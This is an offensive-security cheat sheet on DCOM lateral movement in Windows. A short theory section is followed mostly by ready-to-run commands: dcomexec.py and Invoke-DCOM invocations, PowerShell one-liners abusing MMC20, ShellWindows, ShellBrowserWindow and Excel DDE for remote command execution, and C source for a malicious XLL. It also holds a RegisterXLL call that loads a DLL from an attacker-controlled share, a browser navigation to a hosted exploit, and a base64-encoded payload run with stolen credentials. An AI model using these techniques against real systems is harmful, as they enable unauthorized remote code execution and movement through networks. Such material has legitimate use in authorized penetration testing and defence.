DCOM

Theory

DCOM (Distributed Component Object Model) objects are interesting due to the ability to interact with the objects over the network. Microsoft has some good documentation on DCOM and on COM . You can find a solid list of DCOM applications using PowerShell, by running Get-CimInstance Win32_DCOMApplication.

DCOM (Distributed Component Object Model) Remote Protocol, exposes application objects (COM) via remote procedure calls (RPCs) and consists of a set of extensions layered on the Microsoft Remote Procedure Call Extensions.

The Windows Registry contains the DCOM configuration data in 3 identifiers:

• CLSID – The Class Identifier (CLSID) is a Global Unique Identifier (GUID). Windows stores a CLSID for each installed class in a program. When you need to run a class, you need the correct CLSID, so Windows knows where to go and find the program.

• PROGID – The Programmatic Identifier (PROGID) is an optional identifier a programmer can substitute for the more complicated and strict CLSID. PROGIDs are usually easier to read and understand. However there are no restrictions on how many PROGIDs can have the same name, which causes issues on occasion.

• APPID – The Application Identifier (APPID) identifies all of the classes that are part of the same executable and the permissions required to access it. DCOM cannot work if the APPID isn’t correct.

To make a COM object accessible by DCOM, an AppID must be associated with the CLSID of the class and appropriate permissions need to be given to the AppID. A COM object without an associated AppID cannot be directly accessed from a remote machine. A basic DCOM transaction looks like this:

1. The client computer requests the remote computer to create an object by its CLSID or PROGID. If the client passes the APPID, the remote computer looks up the CLSID using the PROGID.

2. The remote machine checks the APPID and verifies the client has permissions to create the object.

3. DCOMLaunch.exe (if an EXE) or DLLHOST.exe (if a DLL) will create an instance of the class the client computer requested.

4. Communication is successful!

5. The Client can now access all functions in the class on the remote computer.

Practice

Tools

#semi-interactive shell
dcomexec.py domain/user:password@IP <command>

#SilentCommand, mor likely to bypass security solutions
dcomexec.py -silentcommand domain/user:password@IP <command>

#semi-interactive shell using ShellWindows object
# -object [{ShellWindows,ShellBrowserWindow,MMC20}]
dcomexec.py -object ShellWindows domain/user:password@IP <command>

#semi-interactive shell with powershell command processor
dcomexec.py -shell-type powershell domain/user:password@IP <command> 

#Execute code using MMC20.Application object
Invoke-DCOM -ComputerName '<IP>' -Method MMC20.Application -Command "calc.exe"

#Execute code using ExcelDDE object
Invoke-DCOM -ComputerName '<IP>' -Method ExcelDDE -Command "calc.exe"

#Execute dll using RegisterXLL
Invoke-DCOM -ComputerName '<IP>' -Method RegisterXLL -DllPath "C:\Windows\system32\evil.dll"

#Start a service
Invoke-DCOM -ComputerName '<IP>' -Method ServiceStart "MyService"

IDispatch WaaSRemediation

This technique allows loading and executing a .NET assembly in a remote computer's WaaS Medic Service svchost.exe process for DCOM lateral movement.

MMC20.Application

#Connect to the target
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

#Execute commands
$com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\cmd.exe",$null,"/c hostname > c:\pwned.txt","7")

ShellWindows

#Connect to the target
$com = [Type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "<IP>")
$obj = [System.Activator]::CreateInstance($com)

#Execute commands
$obj.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)

ShellBrowserWindow

The ShellBrowserWindow object provide an interface into the Explorer window. This COM object is using the “Document.Application” property and you we call the ShellExecute method on the object returned by the “Document.Application.Parent” property to execute code on a remote target.

#Connect to the target
$com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880", "<IP>")
$obj = [System.Activator]::CreateInstance($com)

#Execute commands
$obj.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "C:\Windows\system32", $null, 0)

Excel.Application (Excel DDE)

DDE, or Dynamic Data Exchange, is a legacy interprocess communication mechanism implemented in some Windows applications. Making Excel (or other MS Office applications) evaluate an expression ("=cmd|' /C calc'!A0", for example) that requires data to be transmitted via DDE from another application. It allows an attacker to specify an arbitrary command line as the DDE server to be run.

The DDEInitiate method exposed by the Excel.Application COM object can be use to execute code on a remote target.

#Connect to the target
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","<IP>"))
$com.DisplayAlerts = $false

#Execute commands
$com.DDEInitiate("cmd", "/c calc.exe")

Excel.Application (RegisterXLL)

#Connect to the target
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","<IP>"))

#Register DLL
$com.Application.RegisterXLL("C:\Windows\evil.dll")
#OR
$com.Application.RegisterXLL("\\<ATTACKING_IP>\Share\evil.dll")

// Compile with: cl.exe notepadXLL.c /LD /o notepad.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void); 
void __cdecl xlAutoOpen() {
    // Triggers when Excel opens
    WinExec("cmd.exe /c notepad.exe", 1);
}
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

Internetexplorer.Application

One of the interesting techniques discovered by homjxi0e, you can open internet Explorer browser on remote machines by using navigate methods which you can use it get command execution by browser exploits.

#Connect to the target
$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("InternetExplorer.Application","<IP>"))
$com.Visible = $true

#Browse to hosted exploit
$com.Navigate("http://192.168.100.1/exploit")

Passing credentials - non-interactive shell

#Base64 payload encode
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$hb = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.126.134"));$hb.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c echo Haboob > C:\hb.txt","7")'))

#RunAsCs with encoded payload
Invoke-RunasCs -Domain test -Username administrator -Password P@ssw0rd -Command "powershell -e JABoAGIAIAA9ACAAWwBhAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAHQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAFAAcgBvAGcASQBEACgAIgBNAE0AQwAyADAALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AIgAsACIAMQA5ADIALgAxADYAOAAuADEAMgA2AC4AMQAzADQAIgApACkAOwAkAGgAYgAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAYwB0AGkAdgBlAFYAaQBlAHcALgBFAHgAZQBjAHUAdABlAFMAaABlAGwAbABDAG8AbQBtAGEAbgBkACgAIgBjAG0AZAAiACwAJABuAHUAbABsACwAIgAvAGMAIABlAGMAaABvACAASABhAGIAbwBvAGIAIAA+ACAAQwA6AFwAaABiAC4AdAB4AHQAIgAsACIANwAiACkA"

Resources